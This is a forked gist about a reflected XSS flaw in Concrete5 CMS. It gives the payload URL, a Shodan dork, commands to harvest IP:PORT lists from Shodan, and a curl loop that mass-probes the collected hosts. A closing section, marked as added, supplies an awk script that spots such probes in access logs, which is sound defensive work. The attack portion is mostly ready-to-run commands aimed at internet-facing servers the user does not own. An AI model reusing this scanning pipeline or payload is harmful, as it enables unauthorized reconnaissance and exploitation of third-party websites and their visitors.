Forked from simrotion13/Concrete5 CMS XSS vulnerability
Created March 16, 2023 22:46
| Concrete5 CMS XSS vulnerability tweet by Jackson | |
| Shodan Dork : 'Set-Cookie: CONCRETE5' | |
| Vulnerable URL : | |
| https://IP:PORT/ccm/system/panels/page/preview_as_user/preview?cID="></iframe><img/src/onerror=.1|alert(document.domain)> | |
| Using the command below, we can download the results. (A Shodan Premium API key is needed.) | |
| shodan download concrete5 'Set-Cookie: CONCRETE5' | |
| I already downloaded the results using the shodan CLI command | |
| We will separate the IP:PORT from the shodan results. For this we will use the shodan parse command along with awk | |
| shodan parse concrete5.json.gz --fields ip_str,port --separator " " | awk '{print $1":"$2}' | tee -a shodan-ip.txt | |
| We will use the process below to automate the findings | |
| cat shodan-ip.txt | while read host do ; do curl --silent --path-as-is --insecure "https://$host/ccm/system/panels/page/preview_as_user/preview?cID=%22%3E%3C/iframe%3E%3Cimg/src/onerror=.1|alert(document.domain)%3E" | grep -qs '"></iframe><img/src/onerror=.1|alert(document.domain)>' && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n"; done | |
| Check the Vulnerable URL |
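
On the defending side, the request shown above leaves a recognizable line in web-server access logs. The following is an added example, not part of the original gist: it flags requests to the `preview_as_user/preview` path whose `cID` is not a plain integer. It assumes combined-format logs and that legitimate `cID` values are numeric page IDs; the function names and log lines are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example (not from the gist): find access-log requests to the
# preview_as_user endpoint whose cID is not a plain integer.
# Assumptions: combined log format; legitimate cID values are numeric.

# Constructed sample log lines (documentation IP ranges, not real traffic).
sample_log() {
cat <<'EOF'
203.0.113.10 - - [16/Mar/2023:22:40:01 +0000] "GET /ccm/system/panels/page/preview_as_user/preview?cID=153 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [16/Mar/2023:22:41:13 +0000] "GET /ccm/system/panels/page/preview_as_user/preview?cID=%22%3E%3C/iframe%3E%3Cimg/src/onerror=.1|alert(document.domain)%3E HTTP/1.1" 200 4870 "-" "curl/7.88.1"
198.51.100.7 - - [16/Mar/2023:22:41:14 +0000] "GET /index.php HTTP/1.1" 200 900 "-" "curl/7.88.1"
192.0.2.44 - - [16/Mar/2023:22:45:09 +0000] "GET /index.php/ccm/system/panels/page/preview_as_user/preview?foo=1&cID=12abc HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
EOF
}

# Reads log lines on stdin; prints "client<TAB>raw cID value" per suspect hit.
detect_cid_probes() {
  awk -F'"' '
    {
      split($2, req, " ")                 # req[2] = request target
      target = req[2]
      q = index(target, "?")
      if (q == 0) next                    # no query string
      path = substr(target, 1, q - 1)
      if (path !~ /\/ccm\/system\/panels\/page\/preview_as_user\/preview$/) next
      n = split(substr(target, q + 1), params, "&")
      for (i = 1; i <= n; i++) {
        if (params[i] !~ /^cID=/) continue
        value = substr(params[i], 5)      # text after "cID="
        if (value !~ /^[0-9]+$/) {        # anything but digits is suspect
          split($1, pre, " ")             # pre[1] = client address
          print pre[1] "\t" value
        }
      }
    }'
}

sample_log | detect_cid_probes
```

Against a real log, call it as `detect_cid_probes < access.log`. A hit shows that such a request arrived, not that the server reflected the value back unescaped.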